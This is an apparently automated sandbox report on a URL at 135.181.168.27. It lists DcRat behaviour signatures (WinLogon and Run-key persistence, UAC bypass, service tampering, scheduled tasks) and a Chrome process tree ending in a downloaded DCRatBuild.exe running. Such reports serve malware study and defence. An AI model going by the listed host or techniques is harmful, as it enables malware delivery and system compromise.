Resubmissions

31-10-2022 17:27

221031-v1vn5abeh3 8

27-10-2022 21:15

221027-z3xzgsddh9 8

27-10-2022 20:25

221027-y7pcgadch3 10

26-10-2022 00:45

221026-a34dtsecd6 8

25-10-2022 23:13

221025-27kk3aebd3 1

Analysis

  • max time kernel
    1158s
  • max time network
    1178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-10-2022 20:25

General

  • Target

    http://135.181.168.27

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies WinLogon for persistence 2 TTPs 15 IoCs
  • Modifies security service 2 TTPs 5 IoCs
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 30 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Drops file in Windows directory 21 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" http://135.181.168.27
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3248
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff985b44f50,0x7ff985b44f60,0x7ff985b44f70
      2⤵
        PID:1884
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1676 /prefetch:2
        2⤵
          PID:224
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2032 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:116
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2312 /prefetch:8
          2⤵
            PID:3556
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2964 /prefetch:1
            2⤵
              PID:2524
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1
              2⤵
                PID:3084
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:8
                2⤵
                  PID:4180
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1468
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
                  2⤵
                    PID:4408
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3172
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
                    2⤵
                      PID:4672
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4480 /prefetch:8
                      2⤵
                        PID:1644
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5112 /prefetch:8
                        2⤵
                          PID:4544
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                          2⤵
                            PID:4088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1592 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4484
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:624
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
                            2⤵
                              PID:1576
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4500 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1548
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8
                              2⤵
                                PID:1396
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:8
                                2⤵
                                  PID:1944
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:8
                                  2⤵
                                    PID:2976
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5272 /prefetch:2
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2588
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 /prefetch:8
                                    2⤵
                                      PID:3492
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
                                      2⤵
                                        PID:844
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
                                        2⤵
                                          PID:4564
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3268
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5096 /prefetch:8
                                          2⤵
                                            PID:4700
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
                                            2⤵
                                              PID:4644
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=988 /prefetch:8
                                              2⤵
                                                PID:4140
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
                                                2⤵
                                                  PID:4932
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
                                                  2⤵
                                                    PID:2836
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
                                                    2⤵
                                                      PID:4892
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:8
                                                      2⤵
                                                        PID:4960
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2940 /prefetch:1
                                                        2⤵
                                                          PID:4808
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
                                                          2⤵
                                                            PID:3368
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
                                                            2⤵
                                                              PID:2412
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
                                                              2⤵
                                                                PID:5044
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:8
                                                                2⤵
                                                                  PID:4812
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3064 /prefetch:8
                                                                  2⤵
                                                                    PID:2072
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
                                                                    2⤵
                                                                      PID:2344
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5356 /prefetch:8
                                                                      2⤵
                                                                        PID:4440
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1228 /prefetch:8
                                                                        2⤵
                                                                          PID:3872
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5284 /prefetch:8
                                                                          2⤵
                                                                            PID:1260
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
                                                                            2⤵
                                                                              PID:1028
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
                                                                              2⤵
                                                                                PID:2004
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
                                                                                2⤵
                                                                                  PID:2216
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1128 /prefetch:8
                                                                                  2⤵
                                                                                    PID:688
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
                                                                                    2⤵
                                                                                      PID:1944
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
                                                                                      2⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4892
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                                                                                      2⤵
                                                                                        PID:2980
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
                                                                                        2⤵
                                                                                          PID:3888
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                                                                          2⤵
                                                                                            PID:1044
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
                                                                                            2⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:3904
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
                                                                                            2⤵
                                                                                              PID:4940
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 /prefetch:8
                                                                                              2⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4188
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5884 /prefetch:8
                                                                                              2⤵
                                                                                                PID:2456
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5616 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:3372
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:2072
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:4936
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5872 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4988
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1568 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:488
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                                                                                                          2⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1468
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=964 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:1156
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5608 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1032
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4920
                                                                                                            • C:\Users\Admin\Downloads\DCRatBuild.exe
                                                                                                              "C:\Users\Admin\Downloads\DCRatBuild.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              • Modifies registry class
